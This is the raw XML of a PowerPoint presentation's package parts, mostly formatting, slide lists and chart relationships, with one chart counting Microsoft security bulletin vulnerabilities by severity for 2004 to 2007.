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Layouts/slideLayout6.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide38.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/diagrams/quickStyle2.xml" ContentType="application/vnd.openxmlformats-officedocument.drawingml.diagramStyle+xml"/>
  <Override PartName="/ppt/slides/slide25.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27.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide45.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+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notesSlides/notesSlide16.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide34.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notesSlides/notesSlide23.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide41.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/diagrams/layout5.xml" ContentType="application/vnd.openxmlformats-officedocument.drawingml.diagramLayout+xml"/>
  <Override PartName="/ppt/diagrams/data6.xml" ContentType="application/vnd.openxmlformats-officedocument.drawingml.diagramData+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide12.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide30.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide7.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/charts/chart3.xml" ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml"/>
  <Override PartName="/ppt/diagrams/layout1.xml" ContentType="application/vnd.openxmlformats-officedocument.drawingml.diagramLayout+xml"/>
  <Override PartName="/ppt/diagrams/data2.xml" ContentType="application/vnd.openxmlformats-officedocument.drawingml.diagramData+xml"/>
  <Override PartName="/ppt/slides/slide9.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/viewProps.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.viewProps+xml"/>
  <Override PartName="/ppt/diagrams/colors4.xml" ContentType="application/vnd.openxmlformats-officedocument.drawingml.diagramColors+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3.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/slides/slide2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notesSlides/notesSlide39.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/diagrams/quickStyle3.xml" ContentType="application/vnd.openxmlformats-officedocument.drawingml.diagramStyle+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s/slide44.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout3.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide17.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide28.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide46.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tags/tag1.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide24.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide26.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide35.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide44.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/diagrams/layout6.xml" ContentType="application/vnd.openxmlformats-officedocument.drawingml.diagram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notesSlides/notesSlide42.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/diagrams/layout4.xml" ContentType="application/vnd.openxmlformats-officedocument.drawingml.diagramLayout+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charts/chart6.xml" ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide11.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diagrams/layout2.xml" ContentType="application/vnd.openxmlformats-officedocument.drawingml.diagramLayout+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide40.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/diagrams/data5.xml" ContentType="application/vnd.openxmlformats-officedocument.drawingml.diagramData+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide6.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/charts/chart4.xml" ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml"/>
  <Override PartName="/ppt/diagrams/data3.xml" ContentType="application/vnd.openxmlformats-officedocument.drawingml.diagramData+xml"/>
  <Override PartName="/ppt/diagrams/colors5.xml" ContentType="application/vnd.openxmlformats-officedocument.drawingml.diagramColors+xml"/>
  <Override PartName="/ppt/slides/slide8.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/handoutMasters/handoutMaster1.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.handoutMaster+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide4.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/charts/chart2.xml" ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml"/>
  <Override PartName="/ppt/diagrams/data1.xml" ContentType="application/vnd.openxmlformats-officedocument.drawingml.diagramData+xml"/>
  <Override PartName="/ppt/diagrams/colors3.xml" ContentType="application/vnd.openxmlformats-officedocument.drawingml.diagramColors+xml"/>
  <Override PartName="/ppt/diagrams/quickStyle6.xml" ContentType="application/vnd.openxmlformats-officedocument.drawingml.diagramStyl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diagrams/colors1.xml" ContentType="application/vnd.openxmlformats-officedocument.drawingml.diagramColors+xml"/>
  <Override PartName="/ppt/diagrams/quickStyle4.xml" ContentType="application/vnd.openxmlformats-officedocument.drawingml.diagramStyle+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notesSlides/notesSlide29.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide47.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notesSlides/notesSlide18.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide36.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Default Extension="wmf" ContentType="image/x-wmf"/>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notesSlides/notesSlide25.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide43.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32.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSl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diagrams/layout3.xml" ContentType="application/vnd.openxmlformats-officedocument.drawingml.diagramLayout+xml"/>
  <Override PartName="/ppt/diagrams/data4.xml" ContentType="application/vnd.openxmlformats-officedocument.drawingml.diagramData+xml"/>
  <Override PartName="/ppt/charts/chart5.xml" ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide10.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/diagrams/colors6.xml" ContentType="application/vnd.openxmlformats-officedocument.drawingml.diagramColors+xml"/>
  <Override PartName="/ppt/slides/slide7.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charts/chart1.xml" ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster2.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slides/slide28.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide39.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/theme/theme4.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide1.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/diagrams/colors2.xml" ContentType="application/vnd.openxmlformats-officedocument.drawingml.diagramColors+xml"/>
  <Override PartName="/ppt/diagrams/quickStyle5.xml" ContentType="application/vnd.openxmlformats-officedocument.drawingml.diagramStyl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Layouts/slideLayout5.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide19.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide48.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/slides/slide24.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide35.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Default Extension="jpeg" ContentType="image/jpeg"/>
  <Override PartName="/ppt/notesSlides/notesSlide37.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/diagrams/quickStyle1.xml" ContentType="application/vnd.openxmlformats-officedocument.drawingml.diagramStyl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p:sldMasterIdLst>
    <p:sldMasterId id="2147483796" r:id="rId1"/>
    <p:sldMasterId id="2147483810" r:id="rId2"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId51"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId52"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="446" r:id="rId3"/>
    <p:sldId id="857" r:id="rId4"/>
    <p:sldId id="830" r:id="rId5"/>
    <p:sldId id="660" r:id="rId6"/>
    <p:sldId id="668" r:id="rId7"/>
    <p:sldId id="653" r:id="rId8"/>
    <p:sldId id="641" r:id="rId9"/>
    <p:sldId id="642" r:id="rId10"/>
    <p:sldId id="728" r:id="rId11"/>
    <p:sldId id="757" r:id="rId12"/>
    <p:sldId id="826" r:id="rId13"/>
    <p:sldId id="780" r:id="rId14"/>
    <p:sldId id="781" r:id="rId15"/>
    <p:sldId id="782" r:id="rId16"/>
    <p:sldId id="815" r:id="rId17"/>
    <p:sldId id="788" r:id="rId18"/>
    <p:sldId id="789" r:id="rId19"/>
    <p:sldId id="793" r:id="rId20"/>
    <p:sldId id="795" r:id="rId21"/>
    <p:sldId id="797" r:id="rId22"/>
    <p:sldId id="798" r:id="rId23"/>
    <p:sldId id="796" r:id="rId24"/>
    <p:sldId id="823" r:id="rId25"/>
    <p:sldId id="824" r:id="rId26"/>
    <p:sldId id="831" r:id="rId27"/>
    <p:sldId id="827" r:id="rId28"/>
    <p:sldId id="763" r:id="rId29"/>
    <p:sldId id="625" r:id="rId30"/>
    <p:sldId id="764" r:id="rId31"/>
    <p:sldId id="765" r:id="rId32"/>
    <p:sldId id="766" r:id="rId33"/>
    <p:sldId id="570" r:id="rId34"/>
    <p:sldId id="721" r:id="rId35"/>
    <p:sldId id="767" r:id="rId36"/>
    <p:sldId id="456" r:id="rId37"/>
    <p:sldId id="518" r:id="rId38"/>
    <p:sldId id="856" r:id="rId39"/>
    <p:sldId id="618" r:id="rId40"/>
    <p:sldId id="855" r:id="rId41"/>
    <p:sldId id="841" r:id="rId42"/>
    <p:sldId id="851" r:id="rId43"/>
    <p:sldId id="843" r:id="rId44"/>
    <p:sldId id="844" r:id="rId45"/>
    <p:sldId id="846" r:id="rId46"/>
    <p:sldId id="848" r:id="rId47"/>
    <p:sldId id="849" r:id="rId48"/>
    <p:sldId id="854" r:id="rId49"/>
    <p:sldId id="537" r:id="rId50"/>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pitchFamily="34" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
      </a:defRPr>
    </a:lvl1pPr>
    <a:lvl2pPr marL="457200" algn="l" rtl="0" fontAlgn="base">
      <a:spcBef>
        <a:spcPct val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
      </a:defRPr>
    </a:lvl2pPr>
    <a:lvl3pPr marL="914400" algn="l" rtl="0" fontAlgn="base">
      <a:spcBef>
        <a:spcPct val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
      </a:defRPr>
    </a:lvl3pPr>
    <a:lvl4pPr marL="1371600" algn="l" rtl="0" fontAlgn="base">
      <a:spcBef>
        <a:spcPct val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
      </a:defRPr>
    </a:lvl4pPr>
    <a:lvl5pPr marL="1828800" algn="l" rtl="0" fontAlgn="base">
      <a:spcBef>
        <a:spcPct val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
      </a:defRPr>
    </a:lvl5pPr>
    <a:lvl6pPr marL="2286000" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
      </a:defRPr>
    </a:lvl6pPr>
    <a:lvl7pPr marL="2743200" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
      </a:defRPr>
    </a:lvl7pPr>
    <a:lvl8pPr marL="3200400" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
      </a:defRPr>
    </a:lvl8pPr>
    <a:lvl9pPr marL="3657600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="Arial" pitchFamily="34"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F7FAFF"/>
    <a:srgbClr val="F66900"/>
    <a:srgbClr val="6AEC9C"/>
    <a:srgbClr val="FCAE9E"/>
    <a:srgbClr val="FDC9BF"/>
    <a:srgbClr val="FDD5BF"/>
    <a:srgbClr val="FFBDD9"/>
  </p:clrMru>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vertBarState="maximized">
    <p:restoredLeft sz="16506" autoAdjust="0"/>
    <p:restoredTop sz="86167" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr>
        <p:scale>
          <a:sx n="70" d="100"/>
          <a:sy n="70" d="100"/>
        </p:scale>
        <p:origin x="-882" y="-120"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2160"/>
        <p:guide orient="horz" pos="891"/>
        <p:guide orient="horz" pos="1198"/>
        <p:guide orient="horz" pos="1487"/>
        <p:guide orient="horz" pos="144"/>
        <p:guide pos="2880"/>
        <p:guide pos="240"/>
        <p:guide pos="552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0" d="100"/>
        <a:sy n="60" d="100"/>
      </p:scale>
      <p:origin x="0" y="0"/>
    </p:cViewPr>
  </p:sorterViewPr>
  <p:notesViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="96" d="100"/>
          <a:sy n="96" d="100"/>
        </p:scale>
        <p:origin x="-3606" y="-90"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2880"/>
        <p:guide pos="2160"/>
      </p:guideLst>
    </p:cSldViewPr>
  </p:notes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handoutMaster" Target="handoutMasters/handout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notesMaster" Target="notesMasters/notesMaster1.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide1.xml"/></Relationships>
</file>

<file path=ppt/charts/_rels/chart1.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="file:///C:\Users\Andrewcu\AppData\Local\Microsoft\Windows\Temporary%20Internet%20Files\Content.Outlook\46WCK9G3\MS%20Vuln%20Counts.xlsx"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file:///C:\Users\Andrewcu\AppData\Local\Microsoft\Windows\Temporary%20Internet%20Files\Content.Outlook\46WCK9G3\MS%20Vuln%20Counts.xlsx" TargetMode="External"/></Relationships>
</file>

<file path=ppt/charts/_rels/chart3.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="file:///C:\Documents%20and%20Settings\mreavey\Desktop\Evil%20Day\mike%20reavey.xlsx" TargetMode="External"/></Relationships>
</file>

<file path=ppt/charts/_rels/chart4.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="file:///C:\Documents%20and%20Settings\mreavey\Desktop\Evil%20Day\mike%20reavey.xlsx" TargetMode="External"/></Relationships>
</file>

<file path=ppt/charts/_rels/chart5.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="file:///C:\Documents%20and%20Settings\mreavey\Desktop\Evil%20Day\mike%20reavey.xlsx" TargetMode="External"/></Relationships>
</file>

<file path=ppt/charts/_rels/chart6.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="file:///C:\Documents%20and%20Settings\mreavey\Desktop\Evil%20Day\mike%20reavey.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1"/>
  <c:lang val="en-US"/>
  <c:chart>
    <c:title>
      <c:tx>
        <c:rich>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Vulnerabilities Reported by Microsoft Security Bulletins</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:layout/>
    </c:title>
    <c:view3D>
      <c:perspective val="30"/>
    </c:view3D>
    <c:plotArea>
      <c:layout/>
      <c:bar3DChart>
        <c:barDir val="col"/>
        <c:grouping val="standard"/>
        <c:ser>
          <c:idx val="2"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>Graphs!$B$3</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Critical</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </c:spPr>
          <c:cat>
            <c:numRef>
              <c:f>Graphs!$A$4:$A$7</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="4"/>
                <c:pt idx="0">
                  <c:v>2004</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>2005</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>2006</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>2007</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Graphs!$B$4:$B$7</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="4"/>
                <c:pt idx="0">
                  <c:v>43</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>78</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>88</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>57</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="3"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
              <c:f>Graphs!$C$3</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Important</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent6"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:numRef>
              <c:f>Graphs!$A$4:$A$7</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="4"/>
                <c:pt idx="0">
                  <c:v>2004</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>2005</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>2006</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>2007</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Graphs!$C$4:$C$7</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="4"/>
                <c:pt idx="0">
                  <c:v>48</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>37</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>29</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>12</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="4"/>
          <c:order val="2"/>
          <c:tx>
            <c:strRef>
              <c:f>Graphs!$D$3</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Moderate</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="FFFF00"/>
            </a:solidFill>
          </c:spPr>
          <c:cat>
            <c:numRef>
              <c:f>Graphs!$A$4:$A$7</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="4"/>
                <c:pt idx="0">
                  <c:v>2004</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>2005</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>2006</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>2007</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Graphs!$D$4:$D$7</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="4"/>
                <c:pt idx="0">
                  <c:v>22</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>36</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>14</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>14</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="5"/>
          <c:order val="3"/>
          <c:tx>
            <c:strRef>
              <c:f>Graphs!$E$3</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Low</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="00B050"/>
            </a:solidFill>
          </c:spPr>
          <c:cat>
            <c:numRef>
              <c:f>Graphs!$A$4:$A$7</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="4"/>
                <c:pt idx="0">
                  <c:v>2004</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>2005</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>2006</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>2007</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Graphs!$E$4:$E$7</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="4"/>
                <c:pt idx="0">
                  <c:v>1</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>2</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>11</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>17</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="4"/>
          <c:tx>
            <c:strRef>
              <c:f>Graphs!$F$3</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Grand Total</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:gradFill>
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="8488C4"/>
                </a:gs>
                <a:gs pos="53000">
                  <a:srgbClr val="D4DEFF"/>
                </a:gs>
                <a:gs pos="83000">
                  <a:srgbClr val="D4DEFF"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="96AB94"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="5400000" scaled="0"/>
            </a:gradFill>
          </c:spPr>
          <c:cat>
            <c:numRef>
              <c:f>Graphs!$A$4:$A$7</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="4"/>
                <c:pt idx="0">
                  <c:v>2004</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>2005</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>2006</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>2007</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Graphs!$F$4:$F$7</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="4"/>
                <c:pt idx="0">
                  <c:v>114</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>153</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>142</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>100</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:shape val="box"/>
        <c:axId val="51110656"/>
        <c:axId val="51112576"/>
        <c:axId val="49211584"/>
      </c:bar3DChart>
      <c:catAx>
        <c:axId val="51110656"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:axPos val="b"/>
        <c:title>
          <c:tx>
            <c:rich>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr>
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US"/>
                  <a:t>Year</a:t>
                </a:r>
              </a:p>
            </c:rich>
          </c:tx>
          <c:layout/>
        </c:title>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:tickLblPos val="nextTo"/>
        <c:crossAx val="51112576"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="51112576"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:axPos val="l"/>
        <c:majorGridlines/>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:tickLblPos val="nextTo"/>
